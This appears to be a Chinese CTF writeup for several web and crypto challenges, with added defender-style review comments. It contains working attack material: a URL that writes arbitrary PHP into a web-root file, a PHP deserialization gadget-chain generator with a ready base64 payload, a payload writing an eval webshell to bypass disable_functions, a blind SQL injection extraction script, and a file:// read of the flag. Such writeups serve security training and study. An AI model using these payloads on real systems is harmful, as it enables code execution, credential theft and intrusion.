[MISC]签到

http://www.longpelaexpertise.com.au/toolsCode.php

image-20210509102244837

[WEB]find it

robots.txt

.1ndexx.php.swp

<?php $link = mysql_connect('localhost', 'root'); /* legacy mysql_* extension (removed in PHP 7.0); connects as root with no password argument */ ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}

#logo {
margin-bottom: 40px;
}
<yle>
</head>
<body>
< img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
<ml>
<?php

#Really easy...
#
# Review notes (defender's reading of this challenge source, 1ndexx.php as
# recovered from the .swp file; the HTML tags `<yle>`, `< img` and `<ml>`
# above look mangled by that recovery and are left as found):
# - The script reads flag.php into memory, then writes the request
#   parameter `code` followed by the flag contents into hack.php, a file
#   inside the web root. Whatever `code` contains is executed as PHP the
#   next time hack.php is requested: an unauthenticated arbitrary file
#   write that turns directly into code execution.
# - The only controls are the keyword blocklist in preg_match() below and
#   a 33-byte length cap. A blocklist on source text enumerates known-bad
#   tokens instead of defining what is allowed, so it is not a reliable
#   control.
# - Mitigation: never write request data into a file the web server will
#   execute; persist it outside the document root with a non-executable
#   extension and validate it against an allow-list.
# - Detection: requests to 1ndexx.php carrying a `code` parameter that
#   contains `<?php`, and creation or modification of hack.php.

# `or` binds looser than `=`, so $file receives the handle and die() runs
# only when fopen() fails.
$file=fopen("flag.php","r") or die("Unable 2 open!");

# The whole flag file is held in memory and later appended to hack.php.
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


# Opened for writing inside the web root: the sink of the vulnerability.
$hack=fopen("hack.php","w") or die("Unable 2 open");

# Untrusted input; no isset() check, so a missing parameter raises a notice.
$a=$_GET['code'];

# Keyword blocklist (note `replace` is listed twice). Case-sensitive, no
# modifiers.
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
# Byte-wise length cap (strlen counts bytes, not characters).
if(strlen($a)>33){
die("nonono.");
}
# User input first, then the flag contents, into an executable .php file.
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

直接写入phpinfo:

http://eci-2zeab1jn4vnk02hulykm.cloudeci1.ichunqiu.com/1ndexx.php?code=<?php phpinfo();?>

然后访问hack.php:

http://eci-2zeab1jn4vnk02hulykm.cloudeci1.ichunqiu.com/hack.php

在 PHPINFO 页面中找到 flag

[WEB]framework

存在WWW.ZIP源码泄露

https://www.anquanke.com/post/id/217930

三条链都可以用。先看下 phpinfo:

<?php
/*
 * Proof-of-concept generator for the "framework" challenge: builds the
 * object graph Swift_KeyCache_DiskKeyCache -> See -> Faker\Generator ->
 * yii\rest\CreateAction, serializes it and prints it base64-encoded.
 * The classes below are minimal stand-ins: they declare only the property
 * names, visibilities and values needed for serialize() to emit the same
 * bytes the real vendored classes would. Nothing runs locally except the
 * final echo.
 *
 * Review notes (defender's reading):
 * - The payload travels in the `message` query parameter (URL below), so
 *   the application presumably passes request data to unserialize(). That
 *   is the root cause: every autoloadable class with magic methods
 *   (__destruct, __wakeup, __toString, __call) becomes reachable.
 * - Property visibility and declaration order are load-bearing: protected
 *   and private properties serialize with NUL-wrapped names
 *   ("\0*\0description", "\0Swift_KeyCache_DiskKeyCache\0keys"), and the
 *   output follows declaration order, so these declarations must not be
 *   restyled.
 * - Mitigation: never unserialize() untrusted input (use json_decode), or
 *   at minimum unserialize($s, ['allowed_classes' => false]). The
 *   disable_functions list quoted further down the page is a blocklist on
 *   function names and does not stop the deserialization itself.
 * - Detection: base64 values in `message` that decode to `O:<n>:"<class>"`
 *   object records.
 */
namespace yii\rest{
    // Stand-in for yii\rest\CreateAction: only the two properties the chain
    // relies on are declared.
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            // A function name used as a string callable; presumably invoked by
            // the real class with $this->id as its argument (see the referenced
            // anquanke writeup) — TODO confirm against vendor source.
            $this->checkAccess = 'assert';
            $this->id = "phpinfo();";
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    // Stand-in for Faker\Generator; the protected $formatters map is what
    // the real class dispatches unknown method names through.
    class Generator{
        protected $formatters;

        public function __construct(){
            // (original note) this needs to be changed to isRunning — the
            // payload on this page still uses the 'render' key
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}

namespace phpDocumentor\Reflection\DocBlock\Tags{

    use Faker\Generator;

    // Stand-in for the See tag; its protected $description is the next hop.
    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    // Entry object of the chain (global namespace). Both properties are
    // private, so they serialize with the class name wrapped in NULs.
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            // Any non-empty map works here; the values themselves are not used.
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    // Generate the PoC: serialize the graph and base64-encode it for the URL.
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
http://eci-2ze8j3xqhbs4r48k0oky.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyNzoiU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlIjoyOntzOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAGtleXMiO2E6MTp7czo0OiJheGluIjthOjE6e3M6MjoiaXMiO3M6ODoiaGFuZHNvbWUiO319czozMzoiAFN3aWZ0X0tleUNhY2hlX0Rpc2tLZXlDYWNoZQBwYXRoIjtPOjQyOiJwaHBEb2N1bWVudG9yXFJlZmxlY3Rpb25cRG9jQmxvY2tcVGFnc1xTZWUiOjE6e3M6MTQ6IgAqAGRlc2NyaXB0aW9uIjtPOjE1OiJGYWtlclxHZW5lcmF0b3IiOjE6e3M6MTM6IgAqAGZvcm1hdHRlcnMiO2E6MTp7czo2OiJyZW5kZXIiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjEwOiJwaHBpbmZvKCk7Ijt9aToxO3M6MzoicnVuIjt9fX19fQ==

可以看到 phpinfo，关键是绕过下面的 disable_functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,mail,putenv,error_log,error_reporting,unset,unlink,return	

参考:https://www.anquanke.com/post/id/170681

写shell绕过:

$this->checkAccess = 'assert';
$this->id = 'file_put_contents("v.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1Rbdl0pOz8+"));';}

蚁剑连接，绕过 disable_functions

image-20210509154116325

[WEB]WebsiteManger

登录页面，图片存在注入，注入后得到用户名、密码

# Boolean-based blind SQL injection extraction script from the writeup for
# the "WebsiteManger" challenge (image.php?id= is injectable). It is kept as
# the author wrote it; the comments below explain the mechanism from a
# defender's point of view and how to close it.
#
# Why it works: the `id` value is evidently concatenated into the SQL
# query, so the server evaluates an attacker-chosen boolean expression and
# leaks one bit per request through the shape of the response (image body
# vs. not).
# Mitigation: bind `id` as a parameter of a prepared statement and cast it
# to int before use; never interpolate request values into SQL.
# Detection: bursts of requests to image.php whose `id` parameter contains
# SQL keywords (select, substr, ascii, group_concat, if).
import requests
req = requests.session()
# Candidate alphabet tried at each character position.
string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

res = ''
# Positions 21..49 of group_concat(password); earlier positions were
# presumably recovered in a previous run — the script does not show that.
for i in range(21,50):
    for j in string:
        url = "http://eci-2zeebn8ci69dx3qyic2l.cloudeci1.ichunqiu.com/image.php?id="
        payload = "if(ascii(substr((select/**/group_concat(password)from(users)),%d,1))=(%s),1,0)"%(i,ord(j))
        r = req.get(url+payload)
        # The oracle: a true condition makes image.php return an image (the
        # body contains the JPEG "JFIF" marker); a false one does not.
        if "JFIF" in r.text:
            res += j
            print(res)
            break
# Values recorded by the author from the run:
#admin
#05b0176855ad7f3e7d9ac

登录后用 file 协议读取 flag 即可

file:///flag

image-20210509142022116

[WEB]ezlight

0day– gml yyds

[Crypto]primegame

http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/

[Crypto]hpcurve

https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup